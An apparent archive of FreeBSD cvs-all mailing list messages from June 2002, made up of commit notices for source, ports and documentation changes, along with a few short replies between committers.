Subject: cvs commit: www/en/releng index.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/18 14:06:19 PDT Modified files: en/releng index.sgml Log: Add a table to the releng page listing the code-freeze status of the major src/ branches. The idea is that we'll keep these updated when we create, freeze, or unfreeze a branch. Suggested by: imp Revision Changes Path 1.12 +78 -2 www/en/releng/index.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:16:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2670E37B40F; Tue, 18 Jun 2002 14:16:09 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILG8f11280; Tue, 18 Jun 2002 14:16:08 -0700 (PDT) (envelope-from bmah) Message-Id: <200206182116.g5ILG8f11280@freefall.freebsd.org> From: "Bruce A. Mah" Date: Tue, 18 Jun 2002 14:16:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/releng article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/18 14:16:08 PDT Modified files: en_US.ISO8859-1/articles/releng article.sgml Log: Add two manpage-related files to the version bump list. Submitted by: dougb, sheldonh Revision Changes Path 1.28 +8 -0 doc/en_US.ISO8859-1/articles/releng/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:18:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 001A437B40F; Tue, 18 Jun 2002 14:18:05 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILI5v11605; Tue, 18 Jun 2002 14:18:05 -0700 (PDT) (envelope-from obrien) Message-Id: <200206182118.g5ILI5v11605@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 14:18:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gdb/gdb defs.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 14:18:05 PDT Modified files: contrib/gdb/gdb defs.h Log: The internal declaration for tilde_expand() now conflicts with the one that was finally added to the readline headers in readline 4.2. Submitted by: ache Revision Changes Path 1.3 +2 -4 src/contrib/gdb/gdb/defs.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:19:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 59AA537B40C; Tue, 18 Jun 2002 14:19:40 -0700 (PDT) Received: (from anders@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILJem11773; Tue, 18 Jun 2002 14:19:40 -0700 (PDT) (envelope-from anders) Message-Id: <200206182119.g5ILJem11773@freefall.freebsd.org> From: Anders Nordby Date: Tue, 18 Jun 2002 14:19:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net Makefile ports/net/p5-Net-Whois-Raw Makefile distinfo pkg-comment pkg-descr pkg-plist ports/net/p5-Net-Whois-Raw/files patch-Raw.pm patch-pwhois.PL X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG anders 2002/06/18 14:19:40 PDT Modified files: net Makefile Added files: net/p5-Net-Whois-Raw Makefile distinfo pkg-comment pkg-descr pkg-plist net/p5-Net-Whois-Raw/files patch-Raw.pm patch-pwhois.PL Log: Add Net::Whois::Raw. PR: 37312 Submitted by: Alex Kapranoff Revision Changes Path 1.789 +1 -0 ports/net/Makefile 1.1 +24 -0 ports/net/p5-Net-Whois-Raw/Makefile (new) 1.1 +1 -0 ports/net/p5-Net-Whois-Raw/distinfo (new) 1.1 +54 -0 ports/net/p5-Net-Whois-Raw/files/patch-Raw.pm (new) 1.1 +40 -0 ports/net/p5-Net-Whois-Raw/files/patch-pwhois.PL (new) 1.1 +1 -0 ports/net/p5-Net-Whois-Raw/pkg-comment (new) 1.1 +16 -0 ports/net/p5-Net-Whois-Raw/pkg-descr (new) 1.1 +8 -0 ports/net/p5-Net-Whois-Raw/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:19:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D18FC37B410; Tue, 18 Jun 2002 14:19:42 -0700 (PDT) Received: (from anders@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILJgS11804; Tue, 18 Jun 2002 14:19:42 -0700 (PDT) (envelope-from anders) Message-Id: <200206182119.g5ILJgS11804@freefall.freebsd.org> From: Anders Nordby Date: Tue, 18 Jun 2002 14:19:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG anders 2002/06/18 14:19:42 PDT Modified files: . modules Log: p5-Net-Whois-Raw --> ports/net/p5-Net-Whois-Raw Revision Changes Path 1.5385 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:20:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1011537B416; Tue, 18 Jun 2002 14:20:07 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILK7011918; Tue, 18 Jun 2002 14:20:07 -0700 (PDT) (envelope-from obrien) Message-Id: <200206182120.g5ILK7011918@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 14:20:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gdb/gdb top.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 14:20:06 PDT Modified files: contrib/gdb/gdb top.c Log: Remove the filename_completion_function() extern that conflicts with the latest version of this fuction in Readline 4.2 Revision Changes Path 1.3 +2 -2 src/contrib/gdb/gdb/top.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:25:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 572E937B409; Tue, 18 Jun 2002 14:25:52 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILPqV12853; Tue, 18 Jun 2002 14:25:52 -0700 (PDT) (envelope-from obrien) Message-Id: <200206182125.g5ILPqV12853@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 14:25:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gdb/gdb utils.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 14:25:52 PDT Modified files: contrib/gdb/gdb utils.c Log: Use these malloc-like bits from libiberty now. Revision Changes Path 1.2 +1170 -184 src/contrib/gdb/gdb/utils.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:30:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D193C37B401; Tue, 18 Jun 2002 14:30:37 -0700 (PDT) Received: (from n_hibma@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILUbI13355; Tue, 18 Jun 2002 14:30:37 -0700 (PDT) (envelope-from n_hibma) Message-Id: <200206182130.g5ILUbI13355@freefall.freebsd.org> From: Nick Hibma Date: Tue, 18 Jun 2002 14:30:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/pc98/pc98 sio.c src/sys/conf options options.i386 options.ia64 options.pc98 src/sys/dev/sio sio.c sioreg.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG n_hibma 2002/06/18 14:30:37 PDT Modified files: sys/pc98/pc98 sio.c sys/conf options options.i386 options.ia64 options.pc98 sys/dev/sio sio.c sioreg.h Log: Make the speed used by gdb over serial settable in the kernel configuration. This facilitates the use in circumstances where you are using a serial console as well. GDB doesn't support anything higher than 9600 baud (19k2 if you are lucky), but the console does. Revision Changes Path 1.326 +2 -0 src/sys/conf/options 1.171 +0 -1 src/sys/conf/options.i386 1.11 +0 -2 src/sys/conf/options.ia64 1.146 +0 -1 src/sys/conf/options.pc98 1.375 +49 -21 src/sys/dev/sio/sio.c 1.20 +5 -0 src/sys/dev/sio/sioreg.h 1.173 +26 -15 src/sys/pc98/pc98/sio.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:32:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 24B0437B407; Tue, 18 Jun 2002 14:32:34 -0700 (PDT) Received: (from julian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILWYj14076; Tue, 18 Jun 2002 14:32:34 -0700 (PDT) (envelope-from julian) Message-Id: <200206182132.g5ILWYj14076@freefall.freebsd.org> From: Julian Elischer Date: Tue, 18 Jun 2002 14:32:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf files src/share/man/man4 ng_device.4 src/sys/netgraph ng_device.c ng_device.h src/sys/modules/netgraph/device Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG julian 2002/06/18 14:32:34 PDT Modified files: sys/conf files Added files: share/man/man4 ng_device.4 sys/netgraph ng_device.c ng_device.h sys/modules/netgraph/device Makefile Log: A node that creates a device entry in /dev (yay devfs) so that /dev/mumble can be the entrypoint to some networking graph, e.g. a tunnel or a remote tape drive or whatever... Not fully tested (by me) yet. Submitted by: Mark Santcroos MFC after: 3 weeks Revision Changes Path 1.1 +109 -0 src/share/man/man4/ng_device.4 (new) 1.650 +1 -0 src/sys/conf/files 1.1 +7 -0 src/sys/modules/netgraph/device/Makefile (new) 1.1 +637 -0 src/sys/netgraph/ng_device.c (new) 1.1 +44 -0 src/sys/netgraph/ng_device.h (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:42:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8137137B400; Tue, 18 Jun 2002 14:42:12 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ILgC715195; Tue, 18 Jun 2002 14:42:12 -0700 (PDT) (envelope-from obrien) Message-Id: <200206182142.g5ILgC715195@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 14:42:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/subversion Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 14:42:12 PDT Modified files: devel/subversion Makefile Log: make clearer what version this is. Revision Changes Path 1.12 +1 -1 ports/devel/subversion/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14:57:43 2002 Delivered-To: cvs-all@freebsd.org Received: from sccrmhc01.attbi.com (sccrmhc01.attbi.com [204.127.202.61]) by hub.freebsd.org (Postfix) with ESMTP id 8F8BC37B40E; Tue, 18 Jun 2002 14:57:19 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc01.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020618215718.DDFO1024.sccrmhc01.attbi.com@blossom.cjclark.org>; Tue, 18 Jun 2002 21:57:18 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g5ILvIJX012278; Tue, 18 Jun 2002 14:57:18 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g5ILvIU6012277; Tue, 18 Jun 2002 14:57:18 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Tue, 18 Jun 2002 14:57:18 -0700 From: "Crist J. Clark" To: Warner Losh Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/etc/mtree BSD.include.dist src/include Makefile src/usr.sbin/wicontrol wicontrol.c Message-ID: <20020618145717.A12206@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <200206172150.g5HLoKk38718@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206172150.g5HLoKk38718@freefall.freebsd.org>; from imp@FreeBSD.org on Mon, Jun 17, 2002 at 02:50:20PM -0700 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, Jun 17, 2002 at 02:50:20PM -0700, Warner Losh wrote: > imp 2002/06/17 14:50:20 PDT > > Modified files: (Branch: RELENG_4) > etc/mtree BSD.include.dist > include Makefile > usr.sbin/wicontrol wicontrol.c > Log: > MFC: Finish merging the move from i386/isa -> dev/wi. > Pointy-hat-to: Imp for not doing this before 4.6. Pointy-hat^2 for using tabs and not spaces in an mtree(8) file. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 15: 4:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 157EA37B40E; Tue, 18 Jun 2002 15:04:48 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IM4mW17403; Tue, 18 Jun 2002 15:04:48 -0700 (PDT) (envelope-from pat) Message-Id: <200206182204.g5IM4mW17403@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 15:04:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/rsync Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 15:04:47 PDT Modified files: net/rsync Makefile Log: Remove perl dependency PR: 39488 Submitted by: maintainer Revision Changes Path 1.73 +0 -1 ports/net/rsync/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 15: 7:12 2002 Delivered-To: cvs-all@freebsd.org Received: from patrocles.silby.com (d2.as28.nwbl0.wi.voyager.net [169.207.69.2]) by hub.freebsd.org (Postfix) with ESMTP id CBAFE37B40C; Tue, 18 Jun 2002 15:07:05 -0700 (PDT) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.4/8.12.4) with ESMTP id g5IM8lcv021999; Tue, 18 Jun 2002 17:08:47 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.4/8.12.4/Submit) with ESMTP id g5IM8lSI021996; Tue, 18 Jun 2002 17:08:47 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Tue, 18 Jun 2002 17:08:47 -0500 (CDT) From: Mike Silbersack To: "Bruce A. Mah" Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: www/en/releng index.sgml In-Reply-To: <200206182106.g5IL6J210384@freefall.freebsd.org> Message-ID: <20020618170830.O21352-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 18 Jun 2002, Bruce A. Mah wrote: > bmah 2002/06/18 14:06:19 PDT > > Modified files: > en/releng index.sgml > Log: > Add a table to the releng page listing the code-freeze status of the > major src/ branches. The idea is that we'll keep these updated when > we create, freeze, or unfreeze a branch. > > Suggested by: imp > > Revision Changes Path > 1.12 +78 -2 www/en/releng/index.sgml How about a flashing notice on freefall's motd? :) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 15:28:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E974837B408; Tue, 18 Jun 2002 15:28:45 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IMSjh24329; Tue, 18 Jun 2002 15:28:45 -0700 (PDT) (envelope-from pat) Message-Id: <200206182228.g5IMSjh24329@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 15:28:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/nhc98 Makefile ports/lang/nhc98/files patch-configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 15:28:45 PDT Modified files: lang/nhc98 Makefile Added files: lang/nhc98/files patch-configure Log: Do not install hat-replated manpages. PR: 39480 Submitted by: maintainer Revision Changes Path 1.10 +2 -3 ports/lang/nhc98/Makefile 1.1 +11 -0 ports/lang/nhc98/files/patch-configure (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 15:41:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DB47D37B404; Tue, 18 Jun 2002 15:41:35 -0700 (PDT) Received: (from alfred@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IMfZN25651; Tue, 18 Jun 2002 15:41:35 -0700 (PDT) (envelope-from alfred) Message-Id: <200206182241.g5IMfZN25651@freefall.freebsd.org> From: Alfred Perlstein Date: Tue, 18 Jun 2002 15:41:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern kern_prot.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alfred 2002/06/18 15:41:35 PDT Modified files: sys/kern kern_prot.c Log: setsugid() touches p->p_flag so assert that the proc is locked. Revision Changes Path 1.157 +2 -0 src/sys/kern/kern_prot.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 15:51:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D01C237B40B; Tue, 18 Jun 2002 15:51:26 -0700 (PDT) Received: (from pdeuskar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IMpQl26996; Tue, 18 Jun 2002 15:51:26 -0700 (PDT) (envelope-from pdeuskar) Message-Id: <200206182251.g5IMpQl26996@freefall.freebsd.org> From: Prafulla Deuskar Date: Tue, 18 Jun 2002 15:51:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/em if_em_fxhw.c if_em_fxhw.h if_em_phy.c if_em_phy.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pdeuskar 2002/06/18 15:51:26 PDT Removed files: sys/dev/em if_em_fxhw.c if_em_fxhw.h if_em_phy.c if_em_phy.h Log: Removed unneeded files. if_em_fxhw.[c,h] and if_em_phy.[c,h] have been merged into one [c,h] file. MFC after: 3 days Revision Changes Path 1.5 +0 -2055 src/sys/dev/em/if_em_fxhw.c (dead) 1.4 +0 -1343 src/sys/dev/em/if_em_fxhw.h (dead) 1.5 +0 -1538 src/sys/dev/em/if_em_phy.c (dead) 1.4 +0 -386 src/sys/dev/em/if_em_phy.h (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 16: 1:18 2002 Delivered-To: cvs-all@freebsd.org Received: from rover.village.org (rover.bsdimp.com [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id D827D37B40A; Tue, 18 Jun 2002 16:01:11 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.3/8.11.3) with ESMTP id g5IN1AY41122; Tue, 18 Jun 2002 17:01:10 -0600 (MDT) (envelope-from imp@village.org) Received: from localhost (warner@rover2.village.org [10.0.0.1]) by harmony.village.org (8.11.6/8.11.6) with ESMTP id g5IN19G37777; Tue, 18 Jun 2002 17:01:09 -0600 (MDT) (envelope-from imp@village.org) Date: Tue, 18 Jun 2002 17:00:56 -0600 (MDT) Message-Id: <20020618.170056.69350171.imp@village.org> To: cjclark@alum.mit.edu, crist.clark@attbi.com Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/etc/mtree BSD.include.dist src/include Makefile src/usr.sbin/wicontrol wicontrol.c From: "M. Warner Losh" In-Reply-To: <20020618145717.A12206@blossom.cjclark.org> References: <200206172150.g5HLoKk38718@freefall.freebsd.org> <20020618145717.A12206@blossom.cjclark.org> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message: <20020618145717.A12206@blossom.cjclark.org> "Crist J. Clark" writes: : On Mon, Jun 17, 2002 at 02:50:20PM -0700, Warner Losh wrote: : > imp 2002/06/17 14:50:20 PDT : > : > Modified files: (Branch: RELENG_4) : > etc/mtree BSD.include.dist : > include Makefile : > usr.sbin/wicontrol wicontrol.c : > Log: : > MFC: Finish merging the move from i386/isa -> dev/wi. : > Pointy-hat-to: Imp for not doing this before 4.6. : : Pointy-hat^2 for using tabs and not spaces in an mtree(8) file. Ummm, where'd I do that? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 16: 2:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 20AE537B40F; Tue, 18 Jun 2002 16:02:06 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IN26228183; Tue, 18 Jun 2002 16:02:06 -0700 (PDT) (envelope-from pat) Message-Id: <200206182302.g5IN26228183@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 16:02:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache2 Makefile distinfo pkg-plist ports/www/apache2/files apache.sh config.layout patch-Makefile.in patch-docs:conf:ssl-std.conf patch-support:apxs.in patch-support:log_server_status.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 16:02:06 PDT Modified files: www/apache2 Makefile distinfo pkg-plist www/apache2/files apache.sh config.layout patch-Makefile.in patch-docs:conf:ssl-std.conf patch-support:log_server_status.in Removed files: www/apache2/files patch-support:apxs.in Log: - Update to 2.0.39, the emergency security update. - Unmark FORBIDDEN PR: ports/39477 Submitted by: maintainer Revision Changes Path 1.118 +30 -32 ports/www/apache2/Makefile 1.50 +1 -1 ports/www/apache2/distinfo 1.5 +1 -1 ports/www/apache2/files/apache.sh 1.2 +1 -1 ports/www/apache2/files/config.layout 1.8 +27 -50 ports/www/apache2/files/patch-Makefile.in 1.5 +19 -28 ports/www/apache2/files/patch-docs:conf:ssl-std.conf 1.7 +0 -49 ports/www/apache2/files/patch-support:apxs.in (dead) 1.6 +4 -8 ports/www/apache2/files/patch-support:log_server_status.in 1.41 +113 -81 ports/www/apache2/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 16: 4:12 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 388A737B40E; Tue, 18 Jun 2002 16:04:07 -0700 (PDT) Received: (from imp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IN47W28518; Tue, 18 Jun 2002 16:04:07 -0700 (PDT) (envelope-from imp) Message-Id: <200206182304.g5IN47W28518@freefall.freebsd.org> From: Warner Losh Date: Tue, 18 Jun 2002 16:04:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/mtree BSD.include.dist X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG imp 2002/06/18 16:04:07 PDT Modified files: (Branch: RELENG_4) etc/mtree BSD.include.dist Log: Ooops, use spaces rather than tabs for the wi entry. Revision Changes Path 1.32.2.10 +2 -2 src/etc/mtree/BSD.include.dist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 16: 4:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7C74237B423; Tue, 18 Jun 2002 16:04:31 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IN4VJ28574; Tue, 